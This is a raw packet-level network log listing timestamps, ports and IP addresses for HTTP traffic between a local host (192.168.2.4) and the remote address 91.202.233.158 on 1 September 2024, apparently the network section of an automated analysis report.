Sep 1, 2024 18:28:20.299216032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299225092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299253941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299494982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299673080 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299700022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299711943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299720049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299731970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299736023 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299753904 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299755096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299766064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299776077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299778938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299787998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299797058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299803019 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299808025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299818039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299828053 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299829006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299839973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299845934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299850941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299863100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299870014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299874067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299885035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299895048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299896002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299906969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299907923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299911022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299916983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299921036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.299942017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.299966097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300668955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300678968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300695896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300710917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300710917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300721884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300733089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300736904 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300744057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300750017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300754070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300765991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300769091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300776005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300786972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300791979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300798893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300808907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300810099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300818920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300822020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300832987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300843954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300848007 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300854921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300864935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300872087 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300877094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300889015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300892115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300901890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300905943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.300926924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.300947905 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301681995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301692963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301702976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301713943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301722050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301724911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301736116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301747084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301762104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301762104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301773071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301783085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301784039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301794052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301805019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301808119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301815033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301826000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301832914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301836014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301846027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301846027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301851988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301857948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301862955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301875114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301886082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301887989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301898956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301908970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301915884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301919937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301923037 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301930904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.301951885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.301975012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.302699089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302710056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302725077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302747965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.302777052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.302824974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302835941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302845955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302856922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302866936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.302867889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302880049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.302881002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302891016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302902937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302906990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.302913904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.302934885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.302953005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384289026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384346962 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384433031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384445906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384454966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384465933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384470940 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384476900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384491920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384497881 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384516001 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384529114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384617090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384625912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384638071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384643078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384649992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384660006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384665012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384679079 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384711027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384831905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384841919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384876013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384886026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384896040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384903908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384915113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384922981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384923935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.384946108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.384972095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385137081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385150909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385165930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385179043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385185003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385189056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385199070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385209084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385210037 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385220051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385231972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385234118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385246038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385260105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385270119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385293007 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385453939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385463953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385473013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385484934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385495901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385512114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385545015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385555029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385564089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385574102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385581970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385582924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385595083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385607004 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385617971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385637999 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385889053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385900974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385909081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385919094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385929108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385931015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385937929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385943890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385948896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385958910 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385962009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.385968924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.385984898 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386006117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386313915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386323929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386332989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386346102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386346102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386356115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386364937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386372089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386375904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386388063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386396885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386399031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386411905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386421919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386435032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386456013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386631966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386641979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386651039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386662006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386667967 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386678934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386697054 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386774063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386784077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386792898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386804104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386811972 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386817932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386826992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386835098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386836052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386847019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386857033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386858940 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386866093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386869907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386877060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386888027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386894941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386897087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.386918068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.386925936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.387278080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387288094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387298107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387312889 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.387327909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.387367010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387377024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387384892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387396097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387404919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387412071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.387414932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387417078 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.387425900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387437105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.387444973 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.387466908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.387991905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388001919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388015032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388024092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388031960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388034105 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388042927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388051987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388058901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388062000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388068914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388072014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388079882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388089895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388097048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388098955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388109922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388119936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388124943 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388129950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388139009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388143063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388149023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.388154030 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388179064 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.388200998 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.389014006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.389024019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.389034033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.389045000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.389055014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.389055967 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.389065027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.389074087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.389081001 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.389096975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.389106035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471021891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471066952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471400023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471411943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471436024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471443892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471453905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471455097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471466064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471477985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471488953 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471501112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471520901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471545935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471556902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471568108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471582890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471596003 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471612930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471699953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471716881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471733093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471738100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471744061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471750975 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471755981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471766949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471774101 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471780062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:20.471785069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:20.471806049 CEST	56177	80	192.168.2.4	91.202.233.158
